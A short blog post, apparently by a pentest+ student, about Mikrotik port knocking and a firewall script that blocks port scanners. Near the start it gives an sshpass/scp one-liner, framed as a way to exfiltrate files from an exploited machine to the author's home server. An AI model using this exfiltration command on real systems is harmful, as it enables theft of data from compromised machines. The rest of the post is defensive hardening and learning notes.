---
title: Mikrotik Firewall Security
# subtitle: Making a Gallery
date: 2022-01-05
tags: ["security", "networking"]
---

As I continue to work towards my pentest+ certification I am continually making scripts along the way and improving security. I first started working on a way to exfiltrate data if I exploited a machine. I want to easily send data to a command and control center if you will. The one-liner I came up with (I love one-liners!) is `sshpass -p SCP_PASSWORD scp -P 22222 file.txt scpuser@HOME_PUBLIC_IP:/home/scpuser`. This command uses sshpass to pass off my pass when trying to authenticate the scp command, I use -P 222222 because for the port I am using, file.txt is the file to be uploaded to the destination server, HOME_PUBLIC_IP is my home IP address where the server runs. I know using sshpass and using the password is not very secure so I made sure to lock down the user account and made sure I can only upload data. I know what you are thinking *Isn't this extremely insecure?*. It is so I added some additional security features. I used this [Mikrotik article](https://wiki.mikrotik.com/wiki/Port_Knocking) to configure port knocking. I used the nmap command given in the article to open the port (Actually adding me to a allowed list) 

`for x in 9000 9001 22222; do nmap -Pn --max-retries 0 -p $x $PUBLIC_HOME_IP; done`

The command above performs a port knock on 9000, 9001, and 22222. I am using an environment variable to mask my public IP `$PUBLIC_HOME_IP`

I can now SSH to my machine or send a file via SCP.

[![asciicast](https://asciinema.org/a/OcNJpRDCLcuhiR0QbT3UC9cVL.svg)](https://asciinema.org/a/OcNJpRDCLcuhiR0QbT3UC9cVL)

In the video above you can see I attempt to SSH and am unable. I then perform a port knock and am granted access.

This got me thinking more about security when creating the port knocking scheme. Couldn't you theoretically perform a port scan on my home IP and have the same desired affect? This lead me to the Mikrotik [Basic universal firewall script](https://wiki.mikrotik.com/wiki/Basic_universal_firewall_script). This script has a ton of cool features including blocking port scanning. Now if you perform a port scan on me you are added to a naughty list and all traffic is dropped...